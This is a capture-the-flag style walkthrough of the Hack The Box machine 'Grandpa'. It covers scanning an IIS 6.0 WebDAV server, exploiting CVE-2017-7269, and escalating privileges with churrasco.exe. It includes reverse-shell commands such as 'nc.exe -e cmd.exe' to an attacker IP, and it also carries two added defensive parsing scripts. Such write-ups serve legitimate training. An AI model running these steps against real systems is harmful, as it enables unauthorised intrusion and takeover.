Grandpa HTB
IP
10.10.10.14
initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.14 | cut -d"/" -f1 | tr '\n' ','
We can see that only port 80 is up on the target. Let's run a more in-depth nmap scan and see if we can find anything else on the machine.
sudo nmap -sCV -p80 -oA Port_scan 10.10.10.14
results
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|   Server Date: Sat, 30 Dec 2023 02:16:39 GMT
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.37 seconds
We can see the following:
We have a Microsoft IIS server, version 6.0 (outdated)
Possible vulnerability: CVE-2017-7269
The WebDAV protocol is enabled, which lets users share, copy, move, edit and otherwise manage files through the web server
Let's check out the web server.
We can see the following:

We can see the website administrator has not created a default page.
For good measure we'll use feroxbuster and see if we can find anything interesting:
feroxbuster -u http://10.10.10.14 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x asp,aspx -o dirs.txt
/images

Since we know WebDAV is enabled, this seems like a good place to look for an attack vector.
These are the supported methods we found in our nmap scan:
TRACE: Echoes back the received request, can be useful for debugging
COPY: Copies a resource from one location to another
PROPFIND: Retrieves properties of a resource
SEARCH: Performs a search based on a given query
LOCK: Locks a resource, preventing other processes from modifying it.
UNLOCK: Releases a lock on a resource
DELETE: Deletes a specified resource
PUT: Uploads a specific resource
MOVE: Moves a resource from one location to another
MKCOL: Creates a new collection (e.g. a directory)
PROPPATCH: Modifies the properties of a resource
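The nmap output above reports two different method lists: the Public header advertised by OPTIONS and the Allow header actually returned for the root URL. Reviewing them side by side is what tells you whether the write methods listed above are really exposed. The following Python script is an added example, not code from the original write-up or from the nmap project; it parses a constructed copy of the scan output above (no live scanning), and the method classification sets and the end-of-life IIS version threshold are this example's own assumptions.

```python
import re

# Constructed sample: a copy of the nmap -sCV output shown above for 10.10.10.14,
# embedded so the script runs offline (this is not a live scan).
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|   Server Date: Sat, 30 Dec 2023 02:16:39 GMT
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# Example's own classification: methods that change server content versus
# methods that only disclose information or reflect the request.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
READ_METHODS = {"PROPFIND", "SEARCH", "TRACE"}

# Assumption for this example: IIS major versions up to 6 are treated as unsupported.
EOL_IIS_MAJOR = 6


def _methods(field):
    """Split 'A, B, C' or 'A B C' into an upper-cased set of method names."""
    return {m.upper() for m in re.split(r"[,\s]+", field.strip()) if m}


def parse_nmap_http(text):
    """Pull the server header and the method lists out of the NSE script output.

    nmap prefixes script lines with '| ', '|_' and indentation; strip that and
    match on the field names that http-webdav-scan and http-methods print.
    """
    parsed = {"server": None, "webdav": False, "public_options": set(),
              "allowed": set(), "risky": set()}
    for raw in text.splitlines():
        line = re.sub(r"^\|_?\s*", "", raw).strip()
        if line.startswith("http-server-header:"):
            parsed["server"] = line.split(":", 1)[1].strip()
        elif line.startswith("http-webdav-scan"):
            parsed["webdav"] = True
        elif line.startswith("Public Options:"):
            parsed["public_options"] = _methods(line.split(":", 1)[1])
        elif line.startswith("Allowed Methods:"):
            parsed["allowed"] = _methods(line.split(":", 1)[1])
        elif line.startswith("Potentially risky methods:"):
            parsed["risky"] = _methods(line.split(":", 1)[1])
    return parsed


def assess(parsed):
    """Turn the parsed scan into the list of findings a reviewer would act on."""
    findings = []
    server = parsed["server"] or ""
    version = re.search(r"Microsoft-IIS/(\d+)\.", server)
    if version and int(version.group(1)) <= EOL_IIS_MAJOR:
        findings.append(f"unsupported web server version: {server}")
    if parsed["webdav"]:
        findings.append("WebDAV is enabled")
    writable = parsed["public_options"] & WRITE_METHODS
    if writable:
        findings.append("content-modifying methods advertised: " + ", ".join(sorted(writable)))
    if "TRACE" in parsed["allowed"]:
        findings.append("TRACE is accepted")
    # Advertised in the Public header but absent from the Allow header for /:
    # these are claims the server makes that it does not honour on the root URL.
    advertised_only = parsed["public_options"] - parsed["allowed"]
    if advertised_only:
        findings.append("advertised but not allowed on /: " + ", ".join(sorted(advertised_only)))
    return findings


if __name__ == "__main__":
    for finding in assess(parse_nmap_http(NMAP_OUTPUT)):
        print("-", finding)
```

On this scan the server advertises PUT, MKCOL, MOVE, DELETE, POST and PROPPATCH in its Public header, but the Allow header for the root lists none of them, which is consistent with the davtest run further down failing to upload anything. When hardening a server like this, the Allow list is the one that matters, and anything in the write set that is not needed should be removed from it.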
We can do some basic enumeration.
Let's check if we can upload a file and which extensions the target will allow.
We can use davtest:
davtest -url http://10.10.10.14

We can see we have a successful connection to the WebDAV server, but we cannot upload (PUT) anything to the server.
After a bit of reading we did find CVE-2017-7269; this could be our attack vector.
A quick Google search finds a working exploit.
For this to work we need to set up a netcat listener and run the exploit.
Start a listener:
rlwrap -cAr nc -lvnp 9001
Run the exploit:
python2 exploit.py 10.10.10.14 80 10.10.14.28 9001
We now have a shell on the target.

Let's gather some information about the system:
systeminfo

We can see we are dealing with an old machine that has not been updated for some time. We can feed this to wesng and see if there are any exploits we can utilise:
sudo /opt/wesng/wes.py --update
sudo /opt/wesng/wes.py systeminfo > possible_exploits
We now have a file of possible exploits we can run on the target.
We also use Windows Exploit Suggester, as I have had the best luck with it:
sudo /opt/Windows-Exploit-Suggester-python3/windows-exploit-suggester.py --update
sudo /opt/Windows-Exploit-Suggester-python3/windows-exploit-suggester.py -i systeminfo -d 2023-12-30-mssb.xlsx
We have the following results:
MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*]   http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]   http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*]   http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*]   http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*]   http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]   https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]   https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]   http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done
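The suggester output above is a flat list: each bulletin carries an [E] (Exploit-DB entry) or [M] (Metasploit module) marker and is followed by [*] reference lines. For a patch-gap review it is more useful as structured records ordered by severity and exploit maturity. The following Python parser is an added example, not code from the original write-up or from the Windows Exploit Suggester project; it runs on a constructed excerpt of the output above, and its ordering rules (Critical before Important, Metasploit module before PoC before unknown, then newest bulletin first) are this example's own choice.

```python
import re
from collections import namedtuple

# Constructed sample: a handful of entries copied from the suggester output
# above, in the tool's native layout where the [E]/[M] marker and the bulletin
# share a line (this is not a live run of the tool).
WES_OUTPUT = """\
[E] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*]   http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]   http://www.exploit-db.com/exploits/34458/
[*]
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[*] done
"""

Bulletin = namedtuple("Bulletin", "id title kb severity marker refs")

# "[E] MS15-051: <title> (<KB>) - <severity>"; the KB number is sometimes printed twice.
BULLETIN_RE = re.compile(
    r"^\[([EM])\]\s+(MS\d{2}-\d{3}):\s+(.*?)\s+\((\d+)\)(?:\s+\(\d+\))?\s+-\s+(\w+)\s*$")
# "[*]   <url>[, | --] <description>, <PoC|MSF>"; the description may be absent.
REF_RE = re.compile(r"^\[\*\]\s+(https?://[^\s,]+)\s*(?:--|,)?\s*(.*)$")

SEVERITY_RANK = {"Critical": 0, "Important": 1, "Moderate": 2, "Low": 3}
# Example's own ranking of exploit maturity: a Metasploit module is treated as
# more readily usable than a proof of concept, which beats an untyped reference.
EXPLOIT_RANK = {"MSF": 0, "PoC": 1, "unknown": 2}


def parse_wes(text):
    """Group each bulletin line with the [*] reference lines that follow it."""
    bulletins, current = [], None
    for line in text.splitlines():
        m = BULLETIN_RE.match(line)
        if m:
            marker, bid, title, kb, severity = m.groups()
            current = Bulletin(bid, title, kb, severity, marker, [])
            bulletins.append(current)
            continue
        r = REF_RE.match(line)
        if r and current is not None:
            url, description = r.groups()
            # The reference type is the last comma-separated token, when present.
            kind = description.rsplit(",", 1)[-1].strip()
            current.refs.append((url, kind if kind in ("PoC", "MSF") else "unknown"))
    return bulletins


def _newest_first(bid):
    """Sort key placing newer bulletins first: MS15-051 -> (-15, -51)."""
    year, seq = bid[2:].split("-")
    return (-int(year), -int(seq))


def _exploit_maturity(bulletin):
    """Best (lowest) exploit rank among the bulletin's references."""
    if not bulletin.refs:
        return EXPLOIT_RANK["unknown"]
    return min(EXPLOIT_RANK[kind] for _, kind in bulletin.refs)


def patch_priority(bulletins):
    """Bulletin ids ordered by severity, then exploit maturity, then age."""
    ordered = sorted(bulletins, key=lambda b: (
        SEVERITY_RANK.get(b.severity, 9), _exploit_maturity(b), _newest_first(b.id)))
    return [b.id for b in ordered]


if __name__ == "__main__":
    parsed = parse_wes(WES_OUTPUT)
    for b in parsed:
        print(f"[{b.marker}] {b.id} {b.severity:9} KB{b.kb} refs={len(b.refs)}")
    print("patch order:", ", ".join(patch_priority(parsed)))
```

The parser is tolerant of the quirks visible in the full output above: a doubled KB number, a reference line with no description, and reference lines that separate the URL from the description with a comma rather than "--". Running it against a complete systeminfo-derived report gives a defender the same list the attacker is working from, ordered for patching rather than for exploitation.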
Let's get some information about our current user:
whoami /all

Possible attack (juicy potato)
Let's try MS15-051 using the following exploit code.
Once we have downloaded the code and unzipped it onto our local machine, we need to transfer it to our target machine.
Let's start an SMB server on our local machine:
sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2support
Let's copy the exploit to our target machine:
copy \\10.10.14.28\shrek123\ms15-051.exe C:\Temp
Transferred over with no problem. We now just need netcat for Windows so we can start another shell.
Transfer netcat over via SMB:
copy \\10.10.14.28\shrek123\nc.exe C:\Temp
While trying to run the exploit, I ran into some problems.
Since we have SeImpersonatePrivilege enabled and it is a Windows Server 2003 machine, we can use the following exploit, churrasco.exe, to perform some token manipulation:
https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
Let's copy our files over again:
copy \\10.10.14.28\shrek123\nc.exe C:\wmpub
copy \\10.10.14.28\shrek123\churrasco.exe C:\wmpub
Quick note: I had problems with nc.exe, and the only version I found that worked was /usr/share/seclists/SecLists-master/Web-Shells/FuzzDB/nc.exe (the SecLists nc.exe version).
Now, once we run the exploit:
churrasco.exe -d "c:\wmpub\nc.exe -e cmd.exe 10.10.14.28 9005"
We can see we have established another shell as the user.
